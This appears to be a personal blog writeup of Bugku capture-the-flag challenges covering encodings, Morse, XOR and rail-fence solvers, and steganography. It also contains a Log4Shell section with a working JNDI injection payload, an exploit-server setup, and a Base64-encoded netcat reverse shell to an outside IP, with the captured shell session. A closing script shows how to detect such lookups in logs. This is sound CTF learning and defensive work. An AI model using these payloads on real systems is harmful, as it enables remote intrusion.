bugku: just playing around

date
Dec 27, 2022 02:41 AM
tags
Writeup
Website

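Miscopied characters

The teacher asked Xiao Ming to copy out a passage, but careless Xiao Ming copied some of the digits as letters and then, out of compulsiveness, changed every letter to uppercase. Can you help Xiao Ming restore the text and work out the answer: QWIHBLGZZXJSXZNVBZW

The digits and letters that look alike are I(i)=>1, L(l)=>1, G(g)=>9, Z(z)=>2, S(s)=>5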
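
One way to apply the look-alike map, added here as an example and not part of the original writeup. It assumes the original text was Base64 (the challenge does not say so) and that the plaintext uses only letters, digits and underscore; the names `options`, `block_candidates` and `recover` are made up for this sketch. Working one 4-character Base64 block at a time keeps the search to at most 81 variants per block.

```python
import base64
import string
from itertools import product

CIPHERTEXT = "QWIHBLGZZXJSXZNVBZW"  # from the challenge text
# Look-alike map given above: the letter that was copied -> the digit it may have been
LOOKALIKE = {"I": "1", "L": "1", "G": "9", "Z": "2", "S": "5"}
# Assumption: the plaintext only uses letters, digits and underscore
ALLOWED = set((string.ascii_letters + string.digits + "_").encode())

def options(ch):
    """Every character the original text could have had at this position."""
    opts = [ch, ch.lower()]
    if ch in LOOKALIKE:
        opts.append(LOOKALIKE[ch])
    return opts

def block_candidates(block):
    """Try every variant of one Base64 block and keep plausible plaintext."""
    found = set()
    for combo in product(*(options(c) for c in block)):
        quad = "".join(combo).ljust(4, "=")  # pad a short final block
        plain = base64.b64decode(quad)
        if plain and set(plain) <= ALLOWED:
            found.add(plain.decode("ascii"))
    return sorted(found)

def recover(ciphertext):
    """Solve block by block, then join the surviving pieces."""
    blocks = [ciphertext[i:i + 4] for i in range(0, len(ciphertext), 4)]
    per_block = [block_candidates(b) for b in blocks]
    return ["".join(parts) for parts in product(*per_block)]

if __name__ == "__main__":
    for candidate in recover(CIPHERTEXT):
        print(candidate)
```

The output is a short list of candidates; the readable one is picked by eye.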
 
 
 

/。-

..-./.-../.-/--./----.--/-../...--/..-./-.-./-.../..-./.----/--.../..-./----./...--/----./----./...../-----/....-/-----.-
Not Bacon
It's Morse, with extras
..-. .-.. .- --. ----.-- -.. ...-- ..-. -.-. -... ..-. .---- --... ..-. ----. ...-- ----. ----. ..... ----- ....- -----.-

The clever little sheep

A little sheep jumped over 2 fences fa{fe13f590lg6d46d0d0}
 

ok

 
There seem to be only three kinds
A pointless challenge, zero practical value
 

Trap the pig in the pigpen

/9j/, isn't that an image?
Confirmed, save it as a file
And what is this now?
That's all
 
 

telnet

 
The beginner version
 
 

Seeing is not believing

What is all this?
A docx is essentially a zip archive
 
 

ping

It's all ICMP
Is it about finding the ones that got through?
Overthinking it
sogo
How you pick them out is up to you
 
 

Linux2

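Nothing much, just carve out the embedded files

This is a decoy
Such a big file and only one image??

strings brave |more
The strings command looks for printable strings in an object file or binary file. A string is any sequence of 4 or more printable characters that ends with a newline or a null character. The strings command is useful for identifying random object files.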
 
 

Beginner reverse engineering

Column mode, regex

Easy_Re Reverse

 
Search using the keyword from the challenge
 
 

Beat the game Reverse

Try another one
# py -3
# coding:utf-8

array1 = [18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62,32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32,16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0]
array2 = [123,32,18,98,119,108,65,41,124,80,125,38,124,111,74,49,83,108,94,108,84,6,96,83,44,121,104,110,32,95,117,101,99,123,127,119,96,48,107,71,92,29,81,107,90,85,64,12,43,76,86,13,114,1,117,126,0]

flag = ''
# Each flag character is array1[i] XOR array2[i] XOR the constant 0x13
for i in range(len(array1)):
    flag += chr(array1[i] ^ array2[i] ^ 0x13)
print(flag)
 

Easy_vb Reverse

 
MCTF{N3t_Rev_1s_E4ay}
 
 

love

 
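Simple annotations
import base64

s = "e3nifIH9b_C@n@dH"
flag = ""
# Undo the per-position shift: the character at index i had i added to it
for i in range(len(s)):
    flag += chr(ord(s[i]) - i)
# What remains is Base64; decode it to get the flag bytes
flag = base64.b64decode(flag)
print(flag)
Decrypt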
 
 

Teacher Ma's Antivirus Guard

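def enFence(string, space):
    # Encode: row i takes every `space`-th character, starting at offset i
    s = ""
    for i in range(space):
        for j in range(i, len(string), space):
            s += string[j]
    print(s)


def deFence(string, space):
    # Every row has `key` characters; the first `extra` rows have one more
    key, extra = divmod(len(string), space)
    rows = []
    pos = 0
    for i in range(space):
        n = key + (1 if i < extra else 0)
        rows.append(string[pos:pos + n])
        pos += n
    # Read the rows back column by column
    s = ""
    for j in range(key + 1):
        for row in rows:
            # stay in bounds: later rows may be one character shorter
            if j < len(row):
                s += row[j]
    print(s)


deFence("fgaag_!l{_oun}amb_ob", 3)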
 

NoString

 
 
 
s = "oehnl3r=<?=hF@CCGPt"
f = "yelhzl)`gy|})|)oehnl3"  # not used below
flag = ""
# Single-byte XOR: every character is XORed with 9
for i in s:
    flag = flag + chr(ord(i) ^ 9)
    print(chr(ord(i) ^ 9))
print(flag)
 

This is just a plain image

There is some strange code
Copy it out

Steganography

exiftool 2.png   
ExifTool Version Number         : 12.30
File Name                       : 2.png
Directory                       : .
File Size                       : 17 KiB
File Modification Date/Time     : 2017:06:07 22:26:44+08:00
File Access Date/Time           : 2021:12:12 18:02:12+08:00
File Inode Change Date/Time     : 2021:12:12 18:02:11+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 500
Image Height                    : 420
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Pixels Per Unit X               : 4724
Pixels Per Unit Y               : 4724
Pixel Units                     : meters
Profile Name                    : Photoshop ICC profile
Profile CMM Type                : Linotronic
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : Hewlett-Packard
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Perceptual
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : Hewlett-Packard
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
White Point X                   : 0.31269
White Point Y                   : 0.32899
Red X                           : 0.63999
Red Y                           : 0.33001
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.05999
Image Size                      : 500x420
Megapixels                      : 0.210
Image Width : 500
Image Height : 420
Pixels Per Unit X : 4724
Pixels Per Unit Y : 4724

The information doesn't match up
Modify it and save
 

Cyberpunk

Something is wrong with the Java environment
Stegsolve doesn't display everything
pass

The bassist

5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS
 
 
 

Be careful when solving challenges -1
 
 

log4j

 
 
${jndi:ldap://cztlh5.dnslog.cn/exp}
The vulnerability is present
 
git clone https://github.com/black9/Log4shell_JNDIExploit.git
unzip log4j.zip

# enter the directory
cd log4j/
java -jar *.jar -i 114.114.114.114 -p 8080
# start nc listening on port 12345
nc -lvn 12345
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64-encoded command]}
The runtime environment also has to be installed
apt install default-jre

${jndi:ldap://102.223.75.148:1389/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}
 
 
➜  Log4shell_JNDIExploit git:(main) ✗ java -jar *.jar -i 102.223.75.148 -p 8080
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
[+] Paylaod: command
[+] Command: nc 102.223.75.148 12345 -e /bin/sh
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA== redirecting to http://102.223.75.148:8080/ExploitWyWFTkcVxR.class
[+] New HTTP Request From /114.67.175.224:46900  /ExploitWyWFTkcVxR.class
[+] Receive ClassRequest: ExploitWyWFTkcVxR.class
[+] Response Code: 200
[+] Received LDAP Query: Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==
~ nc -lvnp 12345
listening on [any] 12345 ...
connect to [102.223.75.148] from (UNKNOWN) [114.67.175.224] 42381



ls
bin
dev
etc
flag
home
lib
linuxrc
media
mnt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
cat flag
flag{60f59ffe0f15aad3d9e544fbef142349}
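
The same requests seen from the defender's side, added here as an example that is not part of the original writeup or of the exploit tool: a log triage function that finds plain `${jndi:...}` lookups, extracts the callback host and port, and decodes the Base64 command segment so an analyst can see what was attempted. The log format, the client address 192.0.2.10 and the function name `triage` are constructed for this sketch; the two lookup strings are the ones quoted above.

```python
import base64
import re

# Matches the plain ${jndi:...} form used in this writeup. Nested-lookup
# obfuscation is not handled and would need normalising first.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|rmi|dns)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)
# Path layout seen in the payload above: .../Command/Base64/<data>
B64_CMD_RE = re.compile(r"/Command/Base64/(?P<b64>[A-Za-z0-9+/=]+)")

# Constructed sample lines (log format and client address are made up);
# the two lookup strings are the ones quoted in the writeup.
SAMPLE_LOG = [
    '192.0.2.10 "GET /index HTTP/1.1" 200 "Mozilla/5.0"',
    '192.0.2.10 "POST /login HTTP/1.1" 200 "${jndi:ldap://cztlh5.dnslog.cn/exp}"',
    '192.0.2.10 "POST /login HTTP/1.1" 200 "${jndi:ldap://102.223.75.148:1389'
    '/Basic/Command/Base64/bmMgMTAyLjIyMy43NS4xNDggMTIzNDUgLWUgL2Jpbi9zaA==}"',
]

def triage(line):
    """Return one finding per JNDI lookup found in a log line."""
    findings = []
    for m in JNDI_RE.finditer(line):
        finding = {
            "scheme": m["scheme"].lower(),
            "host": m["host"],
            "port": int(m["port"]) if m["port"] else None,
            "command": None,
        }
        cmd = B64_CMD_RE.search(m["path"] or "")
        if cmd:
            try:
                raw = base64.b64decode(cmd["b64"], validate=True)
                finding["command"] = raw.decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError subclass
                finding["command"] = "<undecodable>"
        findings.append(finding)
    return findings

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for f in triage(line):
            print(f)
```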
 
 

© lewoking 2021 - 2022